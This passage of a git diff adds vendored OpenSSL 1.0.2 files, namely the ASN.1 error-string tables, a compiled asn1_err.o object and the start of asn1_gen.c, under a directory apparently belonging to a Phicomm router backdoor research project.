+    {ERR_FUNC(ASN1_F_ASN1_UTCTIME_ADJ), "ASN1_UTCTIME_adj"},
+    {ERR_FUNC(ASN1_F_ASN1_UTCTIME_SET), "ASN1_UTCTIME_set"},
+    {ERR_FUNC(ASN1_F_ASN1_VERIFY), "ASN1_verify"},
+    {ERR_FUNC(ASN1_F_B64_READ_ASN1), "B64_READ_ASN1"},
+    {ERR_FUNC(ASN1_F_B64_WRITE_ASN1), "B64_WRITE_ASN1"},
+    {ERR_FUNC(ASN1_F_BIO_NEW_NDEF), "BIO_new_NDEF"},
+    {ERR_FUNC(ASN1_F_BITSTR_CB), "BITSTR_CB"},
+    {ERR_FUNC(ASN1_F_BN_TO_ASN1_ENUMERATED), "BN_to_ASN1_ENUMERATED"},
+    {ERR_FUNC(ASN1_F_BN_TO_ASN1_INTEGER), "BN_to_ASN1_INTEGER"},
+    {ERR_FUNC(ASN1_F_C2I_ASN1_BIT_STRING), "c2i_ASN1_BIT_STRING"},
+    {ERR_FUNC(ASN1_F_C2I_ASN1_INTEGER), "c2i_ASN1_INTEGER"},
+    {ERR_FUNC(ASN1_F_C2I_ASN1_OBJECT), "c2i_ASN1_OBJECT"},
+    {ERR_FUNC(ASN1_F_COLLECT_DATA), "COLLECT_DATA"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_BIT_STRING), "D2I_ASN1_BIT_STRING"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_BOOLEAN), "d2i_ASN1_BOOLEAN"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_BYTES), "d2i_ASN1_bytes"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_GENERALIZEDTIME), "D2I_ASN1_GENERALIZEDTIME"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_HEADER), "D2I_ASN1_HEADER"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_INTEGER), "D2I_ASN1_INTEGER"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_OBJECT), "d2i_ASN1_OBJECT"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_SET), "d2i_ASN1_SET"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_TYPE_BYTES), "d2i_ASN1_type_bytes"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_UINTEGER), "d2i_ASN1_UINTEGER"},
+    {ERR_FUNC(ASN1_F_D2I_ASN1_UTCTIME), "D2I_ASN1_UTCTIME"},
+    {ERR_FUNC(ASN1_F_D2I_AUTOPRIVATEKEY), "d2i_AutoPrivateKey"},
+    {ERR_FUNC(ASN1_F_D2I_NETSCAPE_RSA), "d2i_Netscape_RSA"},
+    {ERR_FUNC(ASN1_F_D2I_NETSCAPE_RSA_2), "D2I_NETSCAPE_RSA_2"},
+    {ERR_FUNC(ASN1_F_D2I_PRIVATEKEY), "d2i_PrivateKey"},
+    {ERR_FUNC(ASN1_F_D2I_PUBLICKEY), "d2i_PublicKey"},
+    {ERR_FUNC(ASN1_F_D2I_RSA_NET), "d2i_RSA_NET"},
+    {ERR_FUNC(ASN1_F_D2I_RSA_NET_2), "D2I_RSA_NET_2"},
+    {ERR_FUNC(ASN1_F_D2I_X509), "D2I_X509"},
+    {ERR_FUNC(ASN1_F_D2I_X509_CINF), "D2I_X509_CINF"},
+    {ERR_FUNC(ASN1_F_D2I_X509_PKEY), "d2i_X509_PKEY"},
+    {ERR_FUNC(ASN1_F_I2D_ASN1_BIO_STREAM), "i2d_ASN1_bio_stream"},
+    {ERR_FUNC(ASN1_F_I2D_ASN1_SET), "i2d_ASN1_SET"},
+    {ERR_FUNC(ASN1_F_I2D_ASN1_TIME), "I2D_ASN1_TIME"},
+    {ERR_FUNC(ASN1_F_I2D_DSA_PUBKEY), "i2d_DSA_PUBKEY"},
+    {ERR_FUNC(ASN1_F_I2D_EC_PUBKEY), "i2d_EC_PUBKEY"},
+    {ERR_FUNC(ASN1_F_I2D_PRIVATEKEY), "i2d_PrivateKey"},
+    {ERR_FUNC(ASN1_F_I2D_PUBLICKEY), "i2d_PublicKey"},
+    {ERR_FUNC(ASN1_F_I2D_RSA_NET), "i2d_RSA_NET"},
+    {ERR_FUNC(ASN1_F_I2D_RSA_PUBKEY), "i2d_RSA_PUBKEY"},
+    {ERR_FUNC(ASN1_F_LONG_C2I), "LONG_C2I"},
+    {ERR_FUNC(ASN1_F_OID_MODULE_INIT), "OID_MODULE_INIT"},
+    {ERR_FUNC(ASN1_F_PARSE_TAGGING), "PARSE_TAGGING"},
+    {ERR_FUNC(ASN1_F_PKCS5_PBE2_SET_IV), "PKCS5_pbe2_set_iv"},
+    {ERR_FUNC(ASN1_F_PKCS5_PBE_SET), "PKCS5_pbe_set"},
+    {ERR_FUNC(ASN1_F_PKCS5_PBE_SET0_ALGOR), "PKCS5_pbe_set0_algor"},
+    {ERR_FUNC(ASN1_F_PKCS5_PBKDF2_SET), "PKCS5_pbkdf2_set"},
+    {ERR_FUNC(ASN1_F_SMIME_READ_ASN1), "SMIME_read_ASN1"},
+    {ERR_FUNC(ASN1_F_SMIME_TEXT), "SMIME_text"},
+    {ERR_FUNC(ASN1_F_X509_CINF_NEW), "X509_CINF_NEW"},
+    {ERR_FUNC(ASN1_F_X509_CRL_ADD0_REVOKED), "X509_CRL_add0_revoked"},
+    {ERR_FUNC(ASN1_F_X509_INFO_NEW), "X509_INFO_new"},
+    {ERR_FUNC(ASN1_F_X509_NAME_ENCODE), "X509_NAME_ENCODE"},
+    {ERR_FUNC(ASN1_F_X509_NAME_EX_D2I), "X509_NAME_EX_D2I"},
+    {ERR_FUNC(ASN1_F_X509_NAME_EX_NEW), "X509_NAME_EX_NEW"},
+    {ERR_FUNC(ASN1_F_X509_NEW), "X509_NEW"},
+    {ERR_FUNC(ASN1_F_X509_PKEY_NEW), "X509_PKEY_new"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ASN1_str_reasons[] = {
+    {ERR_REASON(ASN1_R_ADDING_OBJECT), "adding object"},
+    {ERR_REASON(ASN1_R_ASN1_PARSE_ERROR), "asn1 parse error"},
+    {ERR_REASON(ASN1_R_ASN1_SIG_PARSE_ERROR), "asn1 sig parse error"},
+    {ERR_REASON(ASN1_R_AUX_ERROR), "aux error"},
+    {ERR_REASON(ASN1_R_BAD_CLASS), "bad class"},
+    {ERR_REASON(ASN1_R_BAD_OBJECT_HEADER), "bad object header"},
+    {ERR_REASON(ASN1_R_BAD_PASSWORD_READ), "bad password read"},
+    {ERR_REASON(ASN1_R_BAD_TAG), "bad tag"},
+    {ERR_REASON(ASN1_R_BMPSTRING_IS_WRONG_LENGTH),
+     "bmpstring is wrong length"},
+    {ERR_REASON(ASN1_R_BN_LIB), "bn lib"},
+    {ERR_REASON(ASN1_R_BOOLEAN_IS_WRONG_LENGTH), "boolean is wrong length"},
+    {ERR_REASON(ASN1_R_BUFFER_TOO_SMALL), "buffer too small"},
+    {ERR_REASON(ASN1_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER),
+     "cipher has no object identifier"},
+    {ERR_REASON(ASN1_R_CONTEXT_NOT_INITIALISED), "context not initialised"},
+    {ERR_REASON(ASN1_R_DATA_IS_WRONG), "data is wrong"},
+    {ERR_REASON(ASN1_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(ASN1_R_DECODING_ERROR), "decoding error"},
+    {ERR_REASON(ASN1_R_DEPTH_EXCEEDED), "depth exceeded"},
+    {ERR_REASON(ASN1_R_DIGEST_AND_KEY_TYPE_NOT_SUPPORTED),
+     "digest and key type not supported"},
+    {ERR_REASON(ASN1_R_ENCODE_ERROR), "encode error"},
+    {ERR_REASON(ASN1_R_ERROR_GETTING_TIME), "error getting time"},
+    {ERR_REASON(ASN1_R_ERROR_LOADING_SECTION), "error loading section"},
+    {ERR_REASON(ASN1_R_ERROR_PARSING_SET_ELEMENT),
+     "error parsing set element"},
+    {ERR_REASON(ASN1_R_ERROR_SETTING_CIPHER_PARAMS),
+     "error setting cipher params"},
+    {ERR_REASON(ASN1_R_EXPECTING_AN_INTEGER), "expecting an integer"},
+    {ERR_REASON(ASN1_R_EXPECTING_AN_OBJECT), "expecting an object"},
+    {ERR_REASON(ASN1_R_EXPECTING_A_BOOLEAN), "expecting a boolean"},
+    {ERR_REASON(ASN1_R_EXPECTING_A_TIME), "expecting a time"},
+    {ERR_REASON(ASN1_R_EXPLICIT_LENGTH_MISMATCH), "explicit length mismatch"},
+    {ERR_REASON(ASN1_R_EXPLICIT_TAG_NOT_CONSTRUCTED),
+     "explicit tag not constructed"},
+    {ERR_REASON(ASN1_R_FIELD_MISSING), "field missing"},
+    {ERR_REASON(ASN1_R_FIRST_NUM_TOO_LARGE), "first num too large"},
+    {ERR_REASON(ASN1_R_HEADER_TOO_LONG), "header too long"},
+    {ERR_REASON(ASN1_R_ILLEGAL_BITSTRING_FORMAT), "illegal bitstring format"},
+    {ERR_REASON(ASN1_R_ILLEGAL_BOOLEAN), "illegal boolean"},
+    {ERR_REASON(ASN1_R_ILLEGAL_CHARACTERS), "illegal characters"},
+    {ERR_REASON(ASN1_R_ILLEGAL_FORMAT), "illegal format"},
+    {ERR_REASON(ASN1_R_ILLEGAL_HEX), "illegal hex"},
+    {ERR_REASON(ASN1_R_ILLEGAL_IMPLICIT_TAG), "illegal implicit tag"},
+    {ERR_REASON(ASN1_R_ILLEGAL_INTEGER), "illegal integer"},
+    {ERR_REASON(ASN1_R_ILLEGAL_NESTED_TAGGING), "illegal nested tagging"},
+    {ERR_REASON(ASN1_R_ILLEGAL_NULL), "illegal null"},
+    {ERR_REASON(ASN1_R_ILLEGAL_NULL_VALUE), "illegal null value"},
+    {ERR_REASON(ASN1_R_ILLEGAL_OBJECT), "illegal object"},
+    {ERR_REASON(ASN1_R_ILLEGAL_OPTIONAL_ANY), "illegal optional any"},
+    {ERR_REASON(ASN1_R_ILLEGAL_OPTIONS_ON_ITEM_TEMPLATE),
+     "illegal options on item template"},
+    {ERR_REASON(ASN1_R_ILLEGAL_TAGGED_ANY), "illegal tagged any"},
+    {ERR_REASON(ASN1_R_ILLEGAL_TIME_VALUE), "illegal time value"},
+    {ERR_REASON(ASN1_R_INTEGER_NOT_ASCII_FORMAT), "integer not ascii format"},
+    {ERR_REASON(ASN1_R_INTEGER_TOO_LARGE_FOR_LONG),
+     "integer too large for long"},
+    {ERR_REASON(ASN1_R_INVALID_BIT_STRING_BITS_LEFT),
+     "invalid bit string bits left"},
+    {ERR_REASON(ASN1_R_INVALID_BMPSTRING_LENGTH), "invalid bmpstring length"},
+    {ERR_REASON(ASN1_R_INVALID_DIGIT), "invalid digit"},
+    {ERR_REASON(ASN1_R_INVALID_MIME_TYPE), "invalid mime type"},
+    {ERR_REASON(ASN1_R_INVALID_MODIFIER), "invalid modifier"},
+    {ERR_REASON(ASN1_R_INVALID_NUMBER), "invalid number"},
+    {ERR_REASON(ASN1_R_INVALID_OBJECT_ENCODING), "invalid object encoding"},
+    {ERR_REASON(ASN1_R_INVALID_SEPARATOR), "invalid separator"},
+    {ERR_REASON(ASN1_R_INVALID_TIME_FORMAT), "invalid time format"},
+    {ERR_REASON(ASN1_R_INVALID_UNIVERSALSTRING_LENGTH),
+     "invalid universalstring length"},
+    {ERR_REASON(ASN1_R_INVALID_UTF8STRING), "invalid utf8string"},
+    {ERR_REASON(ASN1_R_IV_TOO_LARGE), "iv too large"},
+    {ERR_REASON(ASN1_R_LENGTH_ERROR), "length error"},
+    {ERR_REASON(ASN1_R_LIST_ERROR), "list error"},
+    {ERR_REASON(ASN1_R_MIME_NO_CONTENT_TYPE), "mime no content type"},
+    {ERR_REASON(ASN1_R_MIME_PARSE_ERROR), "mime parse error"},
+    {ERR_REASON(ASN1_R_MIME_SIG_PARSE_ERROR), "mime sig parse error"},
+    {ERR_REASON(ASN1_R_MISSING_EOC), "missing eoc"},
+    {ERR_REASON(ASN1_R_MISSING_SECOND_NUMBER), "missing second number"},
+    {ERR_REASON(ASN1_R_MISSING_VALUE), "missing value"},
+    {ERR_REASON(ASN1_R_MSTRING_NOT_UNIVERSAL), "mstring not universal"},
+    {ERR_REASON(ASN1_R_MSTRING_WRONG_TAG), "mstring wrong tag"},
+    {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"},
+    {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"},
+    {ERR_REASON(ASN1_R_NOT_ASCII_FORMAT), "not ascii format"},
+    {ERR_REASON(ASN1_R_NOT_ENOUGH_DATA), "not enough data"},
+    {ERR_REASON(ASN1_R_NO_CONTENT_TYPE), "no content type"},
+    {ERR_REASON(ASN1_R_NO_DEFAULT_DIGEST), "no default digest"},
+    {ERR_REASON(ASN1_R_NO_MATCHING_CHOICE_TYPE), "no matching choice type"},
+    {ERR_REASON(ASN1_R_NO_MULTIPART_BODY_FAILURE),
+     "no multipart body failure"},
+    {ERR_REASON(ASN1_R_NO_MULTIPART_BOUNDARY), "no multipart boundary"},
+    {ERR_REASON(ASN1_R_NO_SIG_CONTENT_TYPE), "no sig content type"},
+    {ERR_REASON(ASN1_R_NULL_IS_WRONG_LENGTH), "null is wrong length"},
+    {ERR_REASON(ASN1_R_OBJECT_NOT_ASCII_FORMAT), "object not ascii format"},
+    {ERR_REASON(ASN1_R_ODD_NUMBER_OF_CHARS), "odd number of chars"},
+    {ERR_REASON(ASN1_R_PRIVATE_KEY_HEADER_MISSING),
+     "private key header missing"},
+    {ERR_REASON(ASN1_R_SECOND_NUMBER_TOO_LARGE), "second number too large"},
+    {ERR_REASON(ASN1_R_SEQUENCE_LENGTH_MISMATCH), "sequence length mismatch"},
+    {ERR_REASON(ASN1_R_SEQUENCE_NOT_CONSTRUCTED), "sequence not constructed"},
+    {ERR_REASON(ASN1_R_SEQUENCE_OR_SET_NEEDS_CONFIG),
+     "sequence or set needs config"},
+    {ERR_REASON(ASN1_R_SHORT_LINE), "short line"},
+    {ERR_REASON(ASN1_R_SIG_INVALID_MIME_TYPE), "sig invalid mime type"},
+    {ERR_REASON(ASN1_R_STREAMING_NOT_SUPPORTED), "streaming not supported"},
+    {ERR_REASON(ASN1_R_STRING_TOO_LONG), "string too long"},
+    {ERR_REASON(ASN1_R_STRING_TOO_SHORT), "string too short"},
+    {ERR_REASON(ASN1_R_TAG_VALUE_TOO_HIGH), "tag value too high"},
+    {ERR_REASON(ASN1_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD),
+     "the asn1 object identifier is not known for this md"},
+    {ERR_REASON(ASN1_R_TIME_NOT_ASCII_FORMAT), "time not ascii format"},
+    {ERR_REASON(ASN1_R_TOO_LONG), "too long"},
+    {ERR_REASON(ASN1_R_TYPE_NOT_CONSTRUCTED), "type not constructed"},
+    {ERR_REASON(ASN1_R_TYPE_NOT_PRIMITIVE), "type not primitive"},
+    {ERR_REASON(ASN1_R_UNABLE_TO_DECODE_RSA_KEY), "unable to decode rsa key"},
+    {ERR_REASON(ASN1_R_UNABLE_TO_DECODE_RSA_PRIVATE_KEY),
+     "unable to decode rsa private key"},
+    {ERR_REASON(ASN1_R_UNEXPECTED_EOC), "unexpected eoc"},
+    {ERR_REASON(ASN1_R_UNIVERSALSTRING_IS_WRONG_LENGTH),
+     "universalstring is wrong length"},
+    {ERR_REASON(ASN1_R_UNKNOWN_FORMAT), "unknown format"},
+    {ERR_REASON(ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM),
+     "unknown message digest algorithm"},
+    {ERR_REASON(ASN1_R_UNKNOWN_OBJECT_TYPE), "unknown object type"},
+    {ERR_REASON(ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE), "unknown public key type"},
+    {ERR_REASON(ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM),
+     "unknown signature algorithm"},
+    {ERR_REASON(ASN1_R_UNKNOWN_TAG), "unknown tag"},
+    {ERR_REASON(ASN1_R_UNKOWN_FORMAT), "unknown format"},
+    {ERR_REASON(ASN1_R_UNSUPPORTED_ANY_DEFINED_BY_TYPE),
+     "unsupported any defined by type"},
+    {ERR_REASON(ASN1_R_UNSUPPORTED_CIPHER), "unsupported cipher"},
+    {ERR_REASON(ASN1_R_UNSUPPORTED_ENCRYPTION_ALGORITHM),
+     "unsupported encryption algorithm"},
+    {ERR_REASON(ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE),
+     "unsupported public key type"},
+    {ERR_REASON(ASN1_R_UNSUPPORTED_TYPE), "unsupported type"},
+    {ERR_REASON(ASN1_R_WRONG_PUBLIC_KEY_TYPE), "wrong public key type"},
+    {ERR_REASON(ASN1_R_WRONG_TAG), "wrong tag"},
+    {ERR_REASON(ASN1_R_WRONG_TYPE), "wrong type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_ASN1_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(ASN1_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, ASN1_str_functs);
+        ERR_load_strings(0, ASN1_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..a25da0dc3c8e4f5e929f3caa77323011d97b48d2
GIT binary patch
literal 1368
zcmbtS-AV#c5T0!<t%QE)A~3?bsi+Rx4^bCkh<OuU7=bsjthQ;StLz>@yQo+2QF?@+
zm*_Ey?z*WN_nh^3GJ+bIotbavo1b&eL+<Q!%rHQT0mm?iBnnU(8~B;Nn}Ik?!~4wg
z$1~)!*`wt8MY-+rcJh$zveb6^pxqDC_d6+;+S>?Vh#+?sbsRNcxBx8sM3{+6vJe<B
z?uuY^W{pHV8tdUegfEGI#QjZZhX}lVj><DfZb&mIODaS&oK6AJHTzo(V-%S%@g3~r
z(I0R+fnkYbIIqkZ?ri&R+HyRPRUlU^TJ@%VWu2TC(w5J?8@K9<GD%@+qoJ*s-)(Ta
z3=H!FTazAlIvm)Q&23<1-v?G{HX4qLnA_wI!|U4ixm~#xan)_Jme*`K9`6G4oVv}N
znsx2j4M#Nphe;rp?odC;jHnr&hluqzyMj1j@?D8E$Vo@DI)4rS$58*u-$E|cOrfeG
z`){fs`m(>Y`wFI}w$woJB~L=shhE#z-D52IN%U2rT~)cnfNJXeo=DR7()lIKqgR~~
z`O>_IK^FxuiI(P+e2I_hO_V44pu7eKrqEIiolls4cSLy<{Z}baM8F|3hu$dut4OSd
JnSrD8zW{V3P$~cb

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.c
new file mode 100644
index 0000000..132a9ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.c
@@ -0,0 +1,802 @@
+/* asn1_gen.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/x509v3.h>
+
+#define ASN1_GEN_FLAG           0x10000
+#define ASN1_GEN_FLAG_IMP       (ASN1_GEN_FLAG|1)
+#define ASN1_GEN_FLAG_EXP       (ASN1_GEN_FLAG|2)
+#define ASN1_GEN_FLAG_TAG       (ASN1_GEN_FLAG|3)
+#define ASN1_GEN_FLAG_BITWRAP   (ASN1_GEN_FLAG|4)
+#define ASN1_GEN_FLAG_OCTWRAP   (ASN1_GEN_FLAG|5)
+#define ASN1_GEN_FLAG_SEQWRAP   (ASN1_GEN_FLAG|6)
+#define ASN1_GEN_FLAG_SETWRAP   (ASN1_GEN_FLAG|7)
+#define ASN1_GEN_FLAG_FORMAT    (ASN1_GEN_FLAG|8)
+
+#define ASN1_GEN_STR(str,val)   {str, sizeof(str) - 1, val}
+
+#define ASN1_FLAG_EXP_MAX       20
+
+/* Input formats */
+
+/* ASCII: default */
+#define ASN1_GEN_FORMAT_ASCII   1
+/* UTF8 */
+#define ASN1_GEN_FORMAT_UTF8    2
+/* Hex */
+#define ASN1_GEN_FORMAT_HEX     3
+/* List of bits */
+#define ASN1_GEN_FORMAT_BITLIST 4
+
+struct tag_name_st {
+    const char *strnam;
+    int len;
+    int tag;
+};
+
+typedef struct {
+    int exp_tag;
+    int exp_class;
+    int exp_constructed;
+    int exp_pad;
+    long exp_len;
+} tag_exp_type;
+
+typedef struct {
+    int imp_tag;
+    int imp_class;
+    int utype;
+    int format;
+    const char *str;
+    tag_exp_type exp_list[ASN1_FLAG_EXP_MAX];
+    int exp_count;
+} tag_exp_arg;
+
+static int bitstr_cb(const char *elem, int len, void *bitstr);
+static int asn1_cb(const char *elem, int len, void *bitstr);
+static int append_exp(tag_exp_arg *arg, int exp_tag, int exp_class,
+                      int exp_constructed, int exp_pad, int imp_ok);
+static int parse_tagging(const char *vstart, int vlen, int *ptag,
+                         int *pclass);
+static ASN1_TYPE *asn1_multi(int utype, const char *section, X509V3_CTX *cnf);
+static ASN1_TYPE *asn1_str2type(const char *str, int format, int utype);
+static int asn1_str2tag(const char *tagstr, int len);
+
+ASN1_TYPE *ASN1_generate_nconf(char *str, CONF *nconf)
+{
+    X509V3_CTX cnf;
+
+    if (!nconf)
+        return ASN1_generate_v3(str, NULL);
+
+    X509V3_set_nconf(&cnf, nconf);
+    return ASN1_generate_v3(str, &cnf);
+}
+
+ASN1_TYPE *ASN1_generate_v3(char *str, X509V3_CTX *cnf)
+{
+    ASN1_TYPE *ret;
+    tag_exp_arg asn1_tags;
+    tag_exp_type *etmp;
+
+    int i, len;
+
+    unsigned char *orig_der = NULL, *new_der = NULL;
+    const unsigned char *cpy_start;
+    unsigned char *p;
+    const unsigned char *cp;
+    int cpy_len;
+    long hdr_len;
+    int hdr_constructed = 0, hdr_tag, hdr_class;
+    int r;
+
+    asn1_tags.imp_tag = -1;
+    asn1_tags.imp_class = -1;
+    asn1_tags.format = ASN1_GEN_FORMAT_ASCII;
+    asn1_tags.exp_count = 0;
+    if (CONF_parse_list(str, ',', 1, asn1_cb, &asn1_tags) != 0)
+        return NULL;
+
+    if ((asn1_tags.utype == V_ASN1_SEQUENCE)
+        || (asn1_tags.utype == V_ASN1_SET)) {
+        if (!cnf) {
+            ASN1err(ASN1_F_ASN1_GENERATE_V3,
+                    ASN1_R_SEQUENCE_OR_SET_NEEDS_CONFIG);
+            return NULL;
+        }
+        ret = asn1_multi(asn1_tags.utype, asn1_tags.str, cnf);
+    } else
+        ret = asn1_str2type(asn1_tags.str, asn1_tags.format, asn1_tags.utype);
+
+    if (!ret)
+        return NULL;
+
+    /* If no tagging return base type */
+    if ((asn1_tags.imp_tag == -1) && (asn1_tags.exp_count == 0))
+        return ret;
+
+    /* Generate the encoding */
+    cpy_len = i2d_ASN1_TYPE(ret, &orig_der);
+    ASN1_TYPE_free(ret);
+    ret = NULL;
+    /* Set point to start copying for modified encoding */
+    cpy_start = orig_der;
+
+    /* Do we need IMPLICIT tagging? */
+    if (asn1_tags.imp_tag != -1) {
+        /* If IMPLICIT we will replace the underlying tag */
+        /* Skip existing tag+len */
+        r = ASN1_get_object(&cpy_start, &hdr_len, &hdr_tag, &hdr_class,
+                            cpy_len);
+        if (r & 0x80)
+            goto err;
+        /* Update copy length */
+        cpy_len -= cpy_start - orig_der;
+        /*
+         * For IMPLICIT tagging the length should match the original length
+         * and constructed flag should be consistent.
+         */
+        if (r & 0x1) {
+            /* Indefinite length constructed */
+            hdr_constructed = 2;
+            hdr_len = 0;
+        } else
+            /* Just retain constructed flag */
+            hdr_constructed = r & V_ASN1_CONSTRUCTED;
+        /*
+         * Work out new length with IMPLICIT tag: ignore constructed because
+         * it will mess up if indefinite length
+         */
+        len = ASN1_object_size(0, hdr_len, asn1_tags.imp_tag);
+    } else
+        len = cpy_len;
+
+    /* Work out length in any EXPLICIT, starting from end */
+
+    for (i = 0, etmp = asn1_tags.exp_list + asn1_tags.exp_count - 1;
+         i < asn1_tags.exp_count; i++, etmp--) {
+        /* Content length: number of content octets + any padding */
+        len += etmp->exp_pad;
+        etmp->exp_len = len;
+        /* Total object length: length including new header */
+        len = ASN1_object_size(0, len, etmp->exp_tag);
+    }
+
+    /* Allocate buffer for new encoding */
+
+    new_der = OPENSSL_malloc(len);
+    if (!new_der)
+        goto err;
+
+    /* Generate tagged encoding */
+
+    p = new_der;
+
+    /* Output explicit tags first */
+
+    for (i = 0, etmp = asn1_tags.exp_list; i < asn1_tags.exp_count;
+         i++, etmp++) {
+        ASN1_put_object(&p, etmp->exp_constructed, etmp->exp_len,
+                        etmp->exp_tag, etmp->exp_class);
+        if (etmp->exp_pad)
+            *p++ = 0;
+    }
+
+    /* If IMPLICIT, output tag */
+
+    if (asn1_tags.imp_tag != -1) {
+        if (asn1_tags.imp_class == V_ASN1_UNIVERSAL
+            && (asn1_tags.imp_tag == V_ASN1_SEQUENCE
+                || asn1_tags.imp_tag == V_ASN1_SET))
+            hdr_constructed = V_ASN1_CONSTRUCTED;
+        ASN1_put_object(&p, hdr_constructed, hdr_len,
+                        asn1_tags.imp_tag, asn1_tags.imp_class);
+    }
+
+    /* Copy across original encoding */
+    memcpy(p, cpy_start, cpy_len);
+
+    cp = new_der;
+
+    /* Obtain new ASN1_TYPE structure */
+    ret = d2i_ASN1_TYPE(NULL, &cp, len);
+
+ err:
+    if (orig_der)
+        OPENSSL_free(orig_der);
+    if (new_der)
+        OPENSSL_free(new_der);
+
+    return ret;
+
+}
+
+static int asn1_cb(const char *elem, int len, void *bitstr)
+{
+    tag_exp_arg *arg = bitstr;
+    int i;
+    int utype;
+    int vlen = 0;
+    const char *p, *vstart = NULL;
+
+    int tmp_tag, tmp_class;
+
+    for (i = 0, p = elem; i < len; p++, i++) {
+        /* Look for the ':' in name value pairs */
+        if (*p == ':') {
+            vstart = p + 1;
+            vlen = len - (vstart - elem);
+            len = p - elem;
+            break;
+        }
+    }
+
+    utype = asn1_str2tag(elem, len);
+
+    if (utype == -1) {
+        ASN1err(ASN1_F_ASN1_CB, ASN1_R_UNKNOWN_TAG);
+        ERR_add_error_data(2, "tag=", elem);
+        return -1;
+    }
+
+    /* If this is not a modifier mark end of string and exit */
+    if (!(utype & ASN1_GEN_FLAG)) {
+        arg->utype = utype;
+        arg->str = vstart;
+        /* If no value and not end of string, error */
+        if (!vstart && elem[len]) {
+            ASN1err(ASN1_F_ASN1_CB, ASN1_R_MISSING_VALUE);
+            return -1;
+        }
+        return 0;
+    }
+
+    switch (utype) {
+
+    case ASN1_GEN_FLAG_IMP:
+        /* Check for illegal multiple IMPLICIT tagging */
+        if (arg->imp_tag != -1) {
+            ASN1err(ASN1_F_ASN1_CB, ASN1_R_ILLEGAL_NESTED_TAGGING);
+            return -1;
+        }
+        if (!parse_tagging(vstart, vlen, &arg->imp_tag, &arg->imp_class))
+            return -1;
+        break;
+
+    case ASN1_GEN_FLAG_EXP:
+
+        if (!parse_tagging(vstart, vlen, &tmp_tag, &tmp_class))
+            return -1;
